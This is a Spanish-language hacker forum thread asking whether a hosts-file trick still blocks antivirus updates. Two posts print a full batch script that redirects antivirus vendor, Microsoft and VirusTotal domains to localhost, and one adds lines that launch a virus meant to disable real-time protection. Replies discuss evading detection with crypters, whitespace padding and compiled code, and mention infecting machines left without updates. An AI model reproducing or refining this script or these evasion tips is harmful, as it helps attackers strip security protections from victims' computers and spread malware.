Tema destacado: Grupo de  acebook de elhacker.net
 Autor
|
Tema: Bloquear actualizaciones de antivirus ¿aun funciona esto? (Leído 2,283 veces)
|
|
usuario oculto
|
no lo digo porque el code este detectado, me refiero a su utilidad, creo que continuamente van cambiando los servidores con los que actualizan, sabeis los nombres de algunos? @echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
|
|
|
|
« Última modificación: 26 Diciembre 2010, 16:49 por mansan[a] »
|
En línea
|
Que le jodan a la salud mental! Fecha de registro: 16 Noviembre 2008, 17:38 años atrás users baneados  |
|
|
|
Karcrack
|
Debe funcionar, pero hasta el antivirus mas patetico es capaz de darse cuenta que algo malo ocurre cuando se modificar el fichero hosts  |
|
|
|
|
En línea
|
|
|
|
sabeeee
 Desconectado
Mensajes: 49
|
Esto ya no funciona mas o eso creo.
¿Que es lo que pasa?, los avs se actualizan creo, desde el reg con otro ip asi que creo que esto aunque lo camuflemos con el mejor cripter creo que levantaría sospechas pero porque empresaria a mandar alertas pero es posible ej: con el execript, al otro día mandan a mi virus, lo analizar, después como mi virus desactivo a las actualizaciones de x cantidad de antivirus esa x cantidad de ordenadores con antivirus des-actualizados seguirá infectándose Xd.
|
|
|
|
« Última modificación: 29 Enero 2011, 02:43 por boludoz »
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon
|
|
|
xarlyuno
Desconectado
Mensajes: 33
|
hace poco me topé con el kido.ih ese no te deja ni actualizar ni descargar antivirus pork bloquea el host; pero como lo vi en una pc sin antivirus no se como se comporta con un antivirus, lo claro es que por ejemplo kaspersky lo detecta pk ellos sacaron la cura...
|
|
|
|
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Cualquier AV de pago o con fama detecta eso. No valen los caseros  Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian... |
|
|
|
|
En línea
|
 * Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
|
usuario oculto
|
Cualquier AV de pago o con fama detecta eso. No valen los caseros Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian... Pero todos detectan la acción ¿o el código?, habría que testearlos.Porque si solo fuese código se podría hacer.Hay otros malware que si pueden.
|
|
|
|
« Última modificación: 1 Febrero 2011, 21:22 por mansan[a] »
|
En línea
|
Que le jodan a la salud mental! Fecha de registro: 16 Noviembre 2008, 17:38 años atrás users baneados |
|
|
sabeeee
Desconectado
Mensajes: 49
|
Aki va un código de doble filo. @echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
Lo compilamos con el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe y para que no se vea la ventana y tendremos un virus en tiempo real con triple funcion XD. |
|
|
|
« Última modificación: 3 Febrero 2011, 22:05 por Karcrack »
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon
|
|
|
|
Karcrack
|
Si guardas como .exe lo unico que conseguiras es que no funcione nada Mejor elige .bat  PD: Para codigos relativamente largos utiliza las etiquetas [code][/code] en vez de [quote][/quote] y mas si no coloreas...
|
|
|
|
« Última modificación: 3 Febrero 2011, 22:06 por Karcrack »
|
En línea
|
|
|
|
Garfield07
Desconectado
Mensajes: 1.123
¡Este año voy a por todas! JMJ 2011
|
Karcrack, no vale la pena  Un bat? Como no uses un bat2exe o algo asi... Boludoz, apende programación en lenguajes compilados, que eso se detecta... |
|
|
|
|
En línea
|
* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente. * No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado. * Si compila esta bien, si arranca es perfecto. ¡Wiki elhacker.net!Un saludo |
|
|
YST
Desconectado
Mensajes: 963
I'm you
|
Eso ya dejo de funcionar hace años solo logras bloquear los www.virustotal.com y esas cosas . Aparte si intentas desactivar el kapersky a si .... lo unico que conseguiras son las risas de los programadores |
|
|
|
|
En línea
|
  Yo le enseñe a Kayser a usar objetos en ASM |
|
|
Edu
Desconectado
Mensajes: 1.082
Ex XXX-ZERO-XXX
|
Creo q es asi la cosa, los avs ahora no tienen solo una web de descarga, tienen como 10 igual, entonces si una da error al intentar actualizarse, prueba con la otra y todo asi, bueno la idea es q busques esas 10 web y asi con todos los avs xD
Y tambien meter muchos caracteres en blanco al principio para despistar y etc etc xD
Pero igual sirve para virustotal o para hacer algun virus q no te entre a facebook, sabes como le dolera a muchos? jaja.
|
|
|
|
|
En línea
|
|
|
|
|
usuario oculto
|
Pero entonces los antivirus detectan cuando modificas el archivo o simplemente el code?
|
|
|
|
|
En línea
|
Que le jodan a la salud mental! Fecha de registro: 16 Noviembre 2008, 17:38 años atrás users baneados |
|
|
Edu
Desconectado
Mensajes: 1.082
Ex XXX-ZERO-XXX
|
El codigo para modificar el archivos hosts es el q es detectado, pero se puede modificar para q no lo detecte tan facil, pero como dice Sagrini puede q un av revise todo el rato si se ha modificado y ahi si la cagas xD
|
|
|
|
|
En línea
|
|
|
|
sabeeee
Desconectado
Mensajes: 49
|
Pero todos detectan la acción ¿o el código?, habría que testearlos.Porque si solo fuese código se podría hacer.Hay otros malware que si pueden.
El codigo para modificar el archivos hosts es el q es detectado, pero se puede modificar para q no lo detecte tan facil, pero como dice Sagrini puede q un av revise todo el rato si se ha modificado y ahi si la cagas xD
Solo detectan los movimientos, depende la heurística del AV.
|
|
|
|
|
En línea
|
"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon
|
|
|
|
 |
![WWW](data:text/html,<img src="http://img199.imageshack.us/img199/7002/norris.gif" />;http://)
